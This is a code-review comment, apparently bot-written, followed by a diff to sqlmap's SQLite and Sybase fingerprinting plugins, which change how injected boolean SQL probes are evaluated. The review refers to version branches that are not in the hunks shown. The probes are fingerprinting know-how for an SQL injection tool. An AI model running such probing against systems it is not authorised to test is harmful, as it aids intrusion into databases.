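Review bot: The `>= 6.4.0` branch still calls `re.search("([\d\.]+)", inject.getValue(...))`, and `getValue` can return `None` (the `value is None` tests in inject.py in this same commit show that), which `re.search` rejects with a `TypeError`; that branch and the two `TRANSACTION_TIMESTAMP` branches are the only ones in this chain not converted to `checkBooleanExpression`, and should either follow or at least guard with `or ""`. The new constant in `'d'=(SELECT SUBSTR(MD5('sqlmap'), 1, 1))` pins a digest prefix the old check did not depend on; I could not verify it from here, so confirm it against `md5('sqlmap')`, otherwise the `>= 7.4.0` branch is unreachable. `not ... in ( "1", "2" )` on the 8.3 branch reads better as `not in`. The method continues outside the hunk.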
@@ -81,13 +81,13 @@ class Fingerprint(GenericFingerprint): logMsg = "testing SQLite" logger.info(logMsg) - result = inject.checkBooleanExpression("LAST_INSERT_ROWID()=LAST_INSERT_ROWID()", expectingNone=True) + result = inject.checkBooleanExpression("LAST_INSERT_ROWID()=LAST_INSERT_ROWID()") if result: logMsg = "confirming SQLite" logger.info(logMsg) - result = inject.checkBooleanExpression("SQLITE_VERSION()=SQLITE_VERSION()", expectingNone=True) + result = inject.checkBooleanExpression("SQLITE_VERSION()=SQLITE_VERSION()") if not result: warnMsg = "the back-end DBMS is not SQLite" @@ -95,7 +95,7 @@ class Fingerprint(GenericFingerprint): return False else: - result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0", expectingNone=True) + result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0") kb.dbmsVersion = [ '3' if result else '2' ] setDbms(DBMS.SQLITE) diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index ca5bc2771..8b87e799a 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -81,13 +81,13 @@ class Fingerprint(GenericFingerprint): if conf.direct: result = True else: - result = inject.checkBooleanExpression("tempdb_id()=tempdb_id()", expectingNone=True) + result = inject.checkBooleanExpression("tempdb_id()=tempdb_id()") if result: logMsg = "confirming Sybase" logger.info(logMsg) - result = inject.checkBooleanExpression("suser_id()=suser_id()", expectingNone=True) + result = inject.checkBooleanExpression("suser_id()=suser_id()") if not result: warnMsg = "the back-end DBMS is not Sybase" @@ -103,7 +103,7 @@ class Fingerprint(GenericFingerprint): return True for version in range(12, 16): - result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version, expectingNone=True) + result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version) if result: kb.dbmsVersion = ["%d" % version] break